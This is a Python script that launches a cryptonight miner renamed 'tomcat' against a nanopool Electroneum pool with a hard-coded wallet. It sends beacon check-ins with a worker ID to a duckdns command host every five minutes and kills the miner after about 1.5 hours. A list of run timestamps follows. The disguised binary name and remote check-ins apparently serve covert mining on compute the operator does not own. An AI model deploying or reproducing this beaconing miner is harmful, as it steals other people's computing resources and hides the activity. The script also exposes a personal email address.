import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:26:04.956895
#2018-02-17 17:14:01.768288
#2018-02-17 19:02:04.145176
#2018-02-17 20:50:03.280206
#2018-02-17 22:36:03.920858
#2018-02-18 00:19:05.332317
#2018-02-18 02:10:03.512253
#2018-02-18 03:57:07.326603
#2018-02-18 05:47:03.456531
#2018-02-18 07:40:05.423510
#2018-02-18 09:27:06.746600
#2018-02-18 11:13:06.492828
#2018-02-18 13:00:07.645158
#2018-02-18 14:50:04.065561
#2018-02-18 16:38:01.708703
#2018-02-18 18:27:01.866966
#2018-02-18 20:14:03.670320
#2018-02-18 21:59:06.417136
#2018-02-18 23:48:05.613747
#2018-02-19 01:34:01.382253
#2018-02-19 03:22:07.081032
#2018-02-19 05:07:06.536273
#2018-02-19 06:52:03.689866
#2018-02-19 08:40:09.443515
#2018-02-19 10:29:03.869222
#2018-02-19 12:17:02.171185
#2018-02-19 14:04:04.072992
#2018-02-19 15:54:06.436919
#2018-02-19 17:43:06.452700
#2018-02-19 19:33:01.203492
#2018-02-19 21:20:07.525093
#2018-02-19 23:06:06.522993
#2018-02-20 00:52:01.689169
#2018-02-20 02:41:05.530045
#2018-02-20 04:30:05.101147
#2018-02-20 06:14:03.528377
#2018-02-20 07:59:06.455189
#2018-02-20 09:45:08.029254
#2018-02-20 11:29:04.132978
#2018-02-20 13:16:01.318266
#2018-02-20 15:00:08.100550
#2018-02-20 16:46:07.706982
#2018-02-20 18:36:02.980223
#2018-02-20 20:27:06.360460
#2018-02-20 22:14:07.302837
#2018-02-20 23:56:06.406740
#2018-02-21 01:43:05.345916
#2018-02-21 03:31:05.603738
#2018-02-21 05:19:04.575633
#2018-02-21 07:07:05.619299
#2018-02-21 08:53:04.324854
#2018-02-21 10:40:05.591160
#2018-02-21 12:29:05.898459
#2018-02-21 14:16:01.403918
#2018-02-21 16:03:01.891549
#2018-02-21 17:53:08.790895
#2018-02-21 19:39:08.898517
#2018-02-21 21:27:02.113028
#2018-02-21 23:13:04.138861
#2018-02-22 01:02:05.223071
#2018-02-22 02:49:06.376556
#2018-02-22 04:36:05.953354
#2018-02-22 06:21:02.037152
#2018-02-22 08:08:05.539379
#2018-02-22 09:56:06.981868
#2018-02-22 11:41:05.038300
#2018-02-22 13:27:05.144066
#2018-02-22 15:15:09.790051
#2018-02-22 17:02:08.128423
#2018-02-22 18:49:12.628132
#2018-02-22 20:42:08.508001
#2018-02-22 22:28:04.041591
#2018-02-23 00:13:07.879523
#2018-02-23 02:01:05.735517
#2018-02-23 03:49:03.966755
#2018-02-23 05:39:07.496438
#2018-02-23 07:24:06.904000
#2018-02-23 09:27:07.932664
#2018-02-23 11:34:07.159780
#2018-02-23 13:24:06.972975
#2018-02-23 15:10:07.088358
#2018-02-23 16:58:08.035009
#2018-02-23 19:01:21.128975
#2018-02-23 20:49:05.947980
#2018-02-23 22:40:06.668586
#2018-02-24 00:28:04.755007
#2018-02-24 02:19:01.772052
#2018-02-24 04:10:06.552312
#2018-02-24 05:58:05.836010
#2018-02-24 07:45:08.104952
#2018-02-24 09:31:05.556872
#2018-02-24 11:24:07.305393
#2018-02-24 13:14:01.217833
#2018-02-24 15:04:05.279283
#2018-02-24 16:54:03.820764
#2018-02-24 18:42:05.566190
#2018-02-24 20:33:01.878338
#2018-02-24 22:35:04.347959
#2018-02-25 02:51:05.199324
#2018-02-25 06:26:07.127714